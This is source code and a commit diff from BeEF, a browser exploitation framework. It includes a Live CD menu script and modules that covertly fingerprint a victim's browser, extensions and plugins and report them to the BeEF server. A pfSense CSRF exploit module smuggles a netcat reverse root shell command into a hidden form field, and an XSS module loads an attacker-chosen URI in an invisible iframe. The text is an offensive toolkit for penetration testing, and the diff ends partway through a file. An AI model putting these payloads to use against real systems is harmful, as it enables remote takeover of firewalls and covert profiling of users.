# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'home/beef/doc/COPYING' for copying permission
#
#
# This is the auto startup script for the BeEF Live CD.
# IT SHOULD ONLY BE RUN ON THE LIVE CD
# Download LiveCD here: http://beefproject.com/BeEFLive1.2.iso
# MD5 (BeEFLive1.2.iso) = 1bfba0942a3270ee977ceaeae5a6efd2
#
# This script contains a few fixes to make BeEF play nicely with the way
# remastersys creates the live cd distributable as well as generating host keys
# to enable SSH etc. The script also make it easy for the user to update/start
# the BeEF server
#
#
# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
# (if they do not yet exist)
#
f1="beef"
if [ -f $f1 ] ; then
echo ""
else
ln -s /opt/beef/ beef
ln -s /opt/metasploit-framework/ msf
ln -s /opt/sqlmap/ sqlmap
fi
#
# function to allow BeEF to run in the background
#
run_beef() {
cd /opt/beef/
ruby beef -x
}
#
# function to start msf and run in the background
#
run_msf() {
# start msf
/opt/metasploit-framework/msfconsole -r /opt/beef/test/thirdparty/msf/unit/BeEF.rc 2> /dev/null
}
#
# functions to enable or disable msf integration
#
enable_msf() {
# enable msf integration in main config file
sed -i '1N;$!N;s/metasploit:\n\s\{1,\}enable:\sfalse/metasploit:\n enable: true/g;P;D' /opt/beef/config.yaml
# enable auto_msfrpcd
sed -i 's/auto_msfrpcd:\sfalse/auto_msfrpcd: true/g' /opt/beef/extensions/metasploit/config.yaml
}
disable_msf() {
# disable msf integration in main config file
sed -i '1N;$!N;s/metasploit:\n\s\{1,\}enable:\strue/metasploit:\n enable: false/g;P;D' /opt/beef/config.yaml
# disable auto_msfrpcd
sed -i 's/auto_msfrpcd:\strue/auto_msfrpcd: false/g' /opt/beef/extensions/metasploit/config.yaml
}
#
# function to exit cleanly
#
# trap ctrl-c and call close_bash()
trap close_bash_t INT
close_bash_t() {
# beef would have quit
back_running="0"
close_bash
}
close_bash() {
echo ""
echo "Are you sure you want to exit the LiveCD? (y/N): "
read var
if [ $var = "y" ] ; then
disable_msf
exit
else
show_menu
fi
}
# set default values
bac="0"
#
# User Menu Loop
#
show_menu() {
while true; do
clear
echo "======================================"
echo " BeEF Live CD "
echo "======================================"
echo ""
echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
echo "See the file 'home/beef/doc/COPYING' for copying permission"
echo ""
echo "Welcome to the BeEF Live CD"
echo ""
#
# Check for SSH Host Keys - if they do not exist SSH will be displayed as disabled
# (remastersys has a habit of deleting them during Live CD Creation)
#
f1="/etc/ssh/ssh_host_rsa_key"
if [ -f $f1 ] ; then
echo "[1] Disable SSH [Currently Enabled]"
else
echo "[1] Enable SSH [Currently Disabled]"
fi
echo "[2] Update BeEF"
echo "[3] Update sqlMap (Bundled with LiveCD)"
echo "[4] Update metasploit-framework (Bundled with LiveCD)"
echo ""
if [ "$bac" = "1" ] ; then
echo "[5] Disable BeEF in background mode [Currently Enabled]"
else
echo "[5] Enable BeEF in background mode [Currently Disabled]"
fi
if [ "$sqlm" = "1" ] ; then
echo "[6] Disable sqlMap demo [Currently Enabled]"
else
echo "[6] Enable sqlMap demo [Currently Disabled]"
fi
if [ "$msf" = "1" ] ; then
echo "[7] Disable metasploit-framework integration [Currently Enabled]"
else
echo "[7] Enable metasploit-framework integration [Currently Disabled]"
fi
echo ""
echo "[q] Quit to terminal"
echo ""
if [ "$back_running" = "1" ] ; then
echo "[k] End BeEF process [BeEF running in background mode]"
else
echo "[b] Run BeEF"
fi
echo ""
echo -n "BeEF Live ~# "
read var
#
# Quit liveCD loop
#
if [ $var = "q" ] ; then
close_bash
fi
#
# Create SSH Keys to enable SSH or Delete the Keys to disable
#
if [ $var = "1" ] ; then
if [ -f $f1 ]
then
sudo rm /etc/ssh/ssh_host_rsa_key
sudo rm /etc/ssh/ssh_host_dsa_key
else
sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
echo ""
echo "Please provide a password for ssh user: beef"
sudo passwd beef
echo "ssh enabled"
fi
fi
#
# Update BeEF from github repository
#
if [ $var = "2" ] ; then
cd /opt/beef
git stash
git pull
msf="0"
fi
#
# Update sqlmap from github repository
#
if [ $var = "3" ] ; then
cd /opt/sqlmap
git stash
git pull
fi
#
# Update msf from github repository
#
if [ $var = "4" ] ; then
cd /opt/metasploit-framework
git stash
git pull
fi
#
# set BeEF to run in the background
#
if [ $var = "5" ] ; then
if [ "$bac" = "1" ] ; then
bac="0"
# check and disable sqlmap (requires beef run in the background)
sqlm="0"
else
bac="1"
fi
fi
#
# enable the sqlmap demo
#
if [ $var = "6" ] ; then
if [ "$sqlm" = "1" ] ; then
sqlm="0"
else
sqlm="1"
# requires BeEF be run in the background
bac="1"
fi
fi
#
# enable the msf integration
#
if [ $var = "7" ] ; then
if [ "$msf" = "1" ] ; then
msf="0"
disable_msf
else
msf="1"
enable_msf
fi
fi
#
# end background beef process
#
if [ $var = "k" ] ; then
pkill -x 'ruby'
back_running="0"
fi
#
# Run BeEF
#
if [ $var = "b" ] ; then
if [ "$msf" = "1" ] ; then
#
# First start msf if it is enabled
#
printf "Starting MSF (wait 45 seconds)..."
run_msf &
sleep 45
fi
if [ "$bac" = "1" ] ; then
#
# run beef in the background
#
run_beef &
sleep 5
echo ""
echo "BeEF is running in the background, returning to the menu or running something else now..."
sleep 15
back_running="1"
#
# If the user has enabled it start sqlmap using beef as proxy
#
if [ $sqlm = "1" ] ; then
echo ""
echo "sqlMAP can now be run using the --proxy command set to the BeEF Proxy: http://127.0.0.1:6789 starting the wizard to demo with:"
echo "python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard"
sleep 5
python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard
fi
else
#
# run beef in the foreground
#
cd /opt/beef/
ruby beef -x
fi
fi
done
}
# show user menu
show_menu

2
modules/browser/avant_steal_history/module.rb
View File

@@ -21,7 +21,7 @@ class Avant_steal_history < BeEF::Core::Command
return [
{'name' => 'cId', 'ui_label' => 'Command ID:', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
{'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
]
end

1
modules/browser/browser_fingerprinting/command.js
View File

@@ -35,6 +35,7 @@ beef.execute(function() {
new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")
);

14
modules/browser/detect_activex/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = (beef.browser.hasActiveX())? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "activex="+result);
});

16
modules/browser/detect_activex/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_activex:
enable: true
category: "Browser"
name: "Detect ActiveX"
description: "This module will check if the browser has ActiveX support."
authors: ["bcoles"]
target:
user_notify: ["IE"]
not_working: ["All"]

14
modules/browser/detect_activex/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_activex < BeEF::Core::Command
def post_execute
content = {}
content['activex'] = @datastore['activex']
save content
end
end

95
modules/chrome_extensions/get_chrome_extensions/command.js → modules/browser/detect_extensions/command.js
View File

@@ -6,7 +6,7 @@
beef.execute(function() {
extensions = new Array(
chrome_extensions = new Array(
new Array("blpcfgokakmgnkcojhhkbfbldkacnbeo","YouTube"),
new Array("pjkljhegncpnkpknbcohdijeoejaedia","Gmail"),
new Array("coobgpohoikkiipiblmjeljniedjpjpf","Google Search"),
@@ -1009,7 +1009,61 @@ beef.execute(function() {
new Array("inolmjbojghkehmmlbdmpdlmagalddni","Jagran - India No.1 Hindi News Daily")
);
var detect = function(addon_id, addon_name) {
var firefox_extensions = {
"Adblock Plus" : "chrome://adblockplus/skin/adblockplus.png",
"Auto Copy" : "chrome://autocopy/skin/autocopy.png",
"ColorZilla" : "chrome://colorzilla/skin/logo.png",
"Customize Google" : "chrome://customizegoogle/skin/32x32.png",
"DownThemAll!" : "chrome://dta/content/immagini/icon.png",
"Faster Fox" : "chrome://fasterfox/skin/icon.png",
"Flash Block" : "chrome://flashblock/skin/flash-on-24.png",
"FlashGot" : "chrome://flashgot/skin/icon32.png",
"Forecastfox" : "chrome://forecastfox/skin/images/icon.png",
"Google Toolbar" : "chrome://google-toolbar/skin/icon.png",
"Greasemonkey" : "chrome://greasemonkey/content/status_on.gif",
"IE Tab" : "chrome://ietab/skin/ietab-button-ie16.png",
"IE View" : "chrome://ieview/skin/ieview-icon.png",
"JS View" : "chrome://jsview/skin/jsview.gif",
"Live HTTP Headers" : "chrome://livehttpheaders/skin/img/Logo.png",
"MeasureIt" : "chrome://measureit/skin/measureit.png",
"SEO For Firefox" : "chrome://seo4firefox/content/icon32.png",
"SEOpen" : "chrome://seopen/skin/seopen.png",
"Search Status" : "chrome://searchstatus/skin/cax10.png",
"Server Switcher" : "chrome://switcher/skin/icon.png",
"StumbleUpon" : "chrome://stumbleupon/content/skin/logo32.png",
"Tab Mix Plus" : "chrome://tabmixplus/skin/tmp.png",
"Torrent-Search Toolbar" : "chrome://torrent-search/skin/v.png",
"User Agent Switcher" : "chrome://useragentswitcher/content/logo.png",
"View Source With" : "chrome://viewsourcewith/skin/ff/tb16.png",
"Web Developer" : "chrome://webdeveloper/content/images/logo.png",
"Unhide Passwords" : "chrome://unhidepw/skin/unhidepw.png",
"UrlParams" : "chrome://urlparams/skin/urlparams32.png",
"NewsFox" : "chrome://newsfox/skin/images/home.png",
"Add N Edit Cookies" : "chrome://addneditcookies/skin/images/anec32.png",
"GTDGmail" : "chrome://gtdgmail/content/gtd_lineitem.png",
"QuickJava" : "chrome://quickjava/content/js.png",
"Adblock Filterset.G Updater" : "chrome://unplug/skin/unplug.png",
"BBCode" : "chrome://bbcode/skin/bbcode.png",
"BugMeNot" : "chrome://bugmenot/skin/bugmenot.png",
"ConQuery" : "chrome://conquery/skin/conquery.png",
"Download Manager Tweak" : "chrome://downloadmgr/skin/downloadIcon.png",
"Extended Cookie Manager" : "chrome://xcm/content/allowed.png",
"FireBug" : "chrome://firebug/content/firebug32.png",
"FoxyTunes" : "chrome://foxytunes/skin/logo.png",
"MR Tech Disable XPI Install Delay" : "chrome://disable_xpi_delay/content/icon.png",
"SessionSaver .2" : "chrome://sessionsaver/content/ss.png",
"spooFX" : "chrome://spoofx/skin/main/spoofx.png",
"Statusbar Clock" : "chrome://timestatus/skin/icon.png",
"Torbutton" : "chrome://torbutton/skin/bigbutton_gr.png",
"UnPlug" : "chrome://unplug/skin/unplug.png",
"View Source Chart" : "chrome://vrs/skin/vrssmall.png",
"XPather" : "chrome://xpather/content/iconka.png",
"WOT" : "chrome://wot/skin/fusion/logo.png",
"LastPass" : "chrome://lastpass/skin/vaultdelete.png",
};
var detect_chrome_extension = function(addon_id, addon_name) {
var s = document.createElement('script');
s.onload = function() {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension='+addon_name);
@@ -1018,11 +1072,38 @@ beef.execute(function() {
document.body.appendChild(s);
}
try {
for (var i=0; i<extensions.length; i++) {
detect(extensions[i][0], extensions[i][1]);
}
} catch(e) {}
var detect_firefox_extension = function(addon_url, addon_name) {
var img = document.createElement("img");
img.setAttribute("border", '0');
img.setAttribute("width", '0');
img.setAttribute("height", '0');
img.setAttribute("onload", "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension=" + addon_name+ "');");
img.setAttribute("src", addon_url);
}
if(beef.browser.isC()) {
try {
for (var i=0; i<chrome_extensions.length; i++) {
detect_chrome_extension(chrome_extensions[i][0], chrome_extensions[i][1]);
}
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Chrome extensions failed');
}
} else if(beef.browser.isFF()) {
try {
for (var i in firefox_extensions) {
detect_firefox_extension(firefox_extensions[i], i);
}
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed');
}
} else if(beef.browser.isIE()) {
try {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Internet Explorer extensions is not supported');
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Internet Explorer extensions failed');
}
}
});

22
modules/browser/detect_extensions/config.yaml Normal file
View File

@@ -0,0 +1,22 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_extensions:
enable: true
category: "Browser"
name: "Detect Extensions"
description: "This module detects extensions installed in Google Chrome and Mozilla Firefox."
authors: ["koto", "bcoles", "nbblrr"]
target:
working:
FF:
min_ver: 1
max_ver: latest
C:
min_ver: 1
max_ver: 18
not_working: ["All"]

5
modules/chrome_extensions/get_chrome_extensions/module.rb → modules/browser/detect_extensions/module.rb
View File

@@ -5,14 +5,15 @@
#
# More info:
# http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
# http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html
#
class Detect_chrome_extensions < BeEF::Core::Command
class Detect_extensions < BeEF::Core::Command
def post_execute
content = {}
content['extension'] = @datastore['extension']
save content
end
end

14
modules/browser/detect_quicktime/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = (beef.browser.hasQuickTime())? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "quicktime="+result);
});

15
modules/browser/detect_quicktime/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_quicktime:
enable: true
category: "Browser"
name: "Detect QuickTime"
description: "This module will check if the browser has Quicktime support."
authors: ["bcoles"]
target:
working: ["All"]

14
modules/browser/detect_quicktime/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_quicktime < BeEF::Core::Command
def post_execute
content = {}
content['quicktime'] = @datastore['quicktime']
save content
end
end

14
modules/browser/detect_realplayer/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = ( beef.browser.hasRealPlayer() )? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "realplayer="+result);
});

15
modules/browser/detect_realplayer/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_realplayer:
enable: true
category: "Browser"
name: "Detect RealPlayer"
description: "This module will check if the browser has RealPlayer support."
authors: ["gcattani"]
target:
working: ["All"]

14
modules/browser/detect_realplayer/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_realplayer < BeEF::Core::Command
def post_execute
content = {}
content['realplayer'] = @datastore['realplayer']
save content
end
end

14
modules/browser/detect_silverlight/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = (beef.browser.hasSilverlight())? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "silverlight="+result);
});

15
modules/browser/detect_silverlight/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_silverlight:
enable: true
category: "Browser"
name: "Detect Silverlight"
description: "This module will check if the browser has Silverlight support."
authors: ["bcoles"]
target:
working: ["ALL"]

14
modules/browser/detect_silverlight/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_silverlight < BeEF::Core::Command
def post_execute
content = {}
content['silverlight'] = @datastore['silverlight']
save content
end
end

40
modules/browser/detect_simple_adblock/command.js Normal file
View File

@@ -0,0 +1,40 @@
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
if (document.getElementById('adblock_img')) {
return "Img already created";
}
var img = new Image();
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.src = 'http://simple-adblock.com/adblocktest/files/adbanner.gif';
img.id = 'adblock_img';
img.setAttribute("attr","start");
img.onerror = function() {
this.setAttribute("attr","error");
};
img.onload = function() {
this.setAttribute("attr","load");
};
document.body.appendChild(img);
setTimeout(function() {
var img = document.getElementById('adblock_img');
if (img.getAttribute("attr") == "error") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock returned an error');
} else if (img.getAttribute("attr") == "load") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is disabled or not installed');
} else if (img.getAttribute("attr") == "start") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is enabled');
};
document.body.removeChild(img);
}, 10000);
});

16
modules/browser/detect_simple_adblock/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_simple_adblock:
enable: true
category: "Browser"
name: "Detect Simple Adblock"
description: "This module checks if the Simple Adblock module is active."
authors: ["sussurro"]
target:
working: ["IE"]
not_working: ["All"]

14
modules/browser/detect_simple_adblock/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_simple_adblock< BeEF::Core::Command
def post_execute
content = {}
content['simple_adblock'] = @datastore['simple_adblock'] if not @datastore['simple_adblock'].nil?
save content
end
end

61
modules/browser/detect_toolbars/command.js Normal file
View File

@@ -0,0 +1,61 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var toolbar_ua = new Array (
new Array (" Alexa Toolbar", " Alexa"),
new Array (" AskTbS-PV", " Ask"),
new Array (" BRI", " Bing"),
new Array (" GTB", " Google"),
new Array (" SU ", " Stumble Upon")
)
var toolbar_id = new Array (
new Array ("AlexaCustomScriptId", " Alexa")
)
var result = '';
var separator = ", ";
// CHECK USER-AGENT
for (var i = 0; i < toolbar_ua.length; i++) {
var agentRegex = new RegExp( toolbar_ua[i][0], 'g' );
if ( agentRegex.exec(navigator.userAgent) ) {
result += toolbar_ua[i][1] + separator;
}
}
// CHECK ELEMENT ID (DOM)
for (var i = 0; i < toolbar_id.length; i++) {
var element = document.getElementById( toolbar_id[i][0] );
if ( typeof(element) != 'undefined' && element != null ) {
result += toolbar_id[i][1] + separator;
}
}
// ENDING
if ( result != '' ) {
result = result.slice(0, -separator.length);
} else if ( result == '' ) {
result = " no toolbars detected";
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "toolbars="+result);
});

15
modules/browser/detect_toolbars/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Detect_toolbars:
enable: true
category: "Browser"
name: "Detect Toolbars"
description: "Detects which browser toolbars are installed."
authors: ["gcattani"]
target:
working: ["All"]

14
modules/browser/detect_toolbars/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_toolbars < BeEF::Core::Command
def post_execute
content = {}
content['toolbars'] = @datastore['toolbars']
save content
end
end

14
modules/browser/detect_vlc/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = ( beef.browser.hasVLC() )? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "vlc="+result);
});

15
modules/browser/detect_vlc/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_vlc:
enable: true
category: "Browser"
name: "Detect VLC"
description: "This module will check if the browser has VLC plugin."
authors: ["nbblrr"]
target:
working: ["IE", "FF", "C"]

14
modules/browser/detect_vlc/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_vlc < BeEF::Core::Command
def post_execute
content = {}
content['vlc'] = @datastore['vlc']
save content
end
end

16
modules/chrome_extensions/get_chrome_extensions/config.yaml
View File

@@ -1,16 +0,0 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_chrome_extensions:
enable: true
category: "Chrome Extensions"
name: "Get Chrome Extensions"
description: "This module detects if any of the top 1,000 Chrome extensions are installed."
authors: ["koto", "bcoles"]
target:
working: ["C"]
not_working: ["All"]

11
modules/debug/test_http_bind_raw/command.js Normal file
View File

@@ -0,0 +1,11 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=mounted to /beef');
});

15
modules/debug/test_http_bind_raw/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_http_bind_raw:
enable: true
category: "Debug"
name: "Test HTTP Bind Raw"
description: "Test the HTTP 'bind_raw' handler."
authors: ["bcoles"]
target:
working: ["All"]

20
modules/debug/test_http_bind_raw/module.rb Normal file
View File

@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_http_bind_raw < BeEF::Core::Command
def pre_send
configuration = BeEF::Core::Configuration.instance
xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html','beef'=>xss_hook_url}, 'hello world!', '/beef', -1)
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

11
modules/debug/test_http_redirect/command.js Normal file
View File

@@ -0,0 +1,11 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=mounted to /redirect');
});

15
modules/debug/test_http_redirect/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_http_redirect:
enable: true
category: "Debug"
name: "Test HTTP Redirect"
description: "Test the HTTP 'redirect' handler."
authors: ["bcoles"]
target:
working: ["All"]

18
modules/debug/test_http_redirect/module.rb Normal file
View File

@@ -0,0 +1,18 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_http_redirect < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_redirect('http://beefproject.com', '/redirect')
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

24
modules/exploits/pfsense/command.js Normal file
View File

@@ -0,0 +1,24 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
var pfsense_iframe = beef.dom.createIframeXsrfForm("https://" + rhost + ":" + rport +"/system_firmware.php", "POST",
[{'type':'hidden', 'name':'kerneltype', 'value':'SMP > /boot/kernel/pfsense_kernel.txt;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' + lhost + ' ' + lport + ' >/tmp/f &'}]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(pfsense_iframe);
}
setTimeout("cleanup()", 15000);
});

15
modules/exploits/pfsense/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
pfsense_reverse_root_shell_csrf:
enable: true
category: "Exploits"
name: "pfSense Reverse Root Shell CSRF"
description: "Attempts to get a reverse root shell on a pfSense 2.0.1 firewall/router.<br />Vulnerablity found and PoC provided by Yann CAM @ Synetis.<br />The method described by <a href='http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet'>Jeff Price</a> has been used to create a reverse shell with netcat.<br />For more information refer to <a href='http://www.exploit-db.com/exploits/23901/'>http://www.exploit-db.com/exploits/23901/</a><br />Patched in version 2.0.2."
authors: ["bmantra"]
target:
working: ["ALL"]

24
modules/exploits/pfsense/module.rb Normal file
View File

@@ -0,0 +1,24 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Pfsense_reverse_root_shell_csrf < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = "#{configuration.get("beef.http.host")}"
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '443' },
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

17
modules/exploits/sqlitemanager_xss/command.js Normal file
View File

@@ -0,0 +1,17 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var uri = '<%= @uri.gsub(/'/, "\\'") %>';
var serendipity_iframe = beef.dom.createInvisibleIframe();
serendipity_iframe.setAttribute('src', uri);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
});

15
modules/exploits/sqlitemanager_xss/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
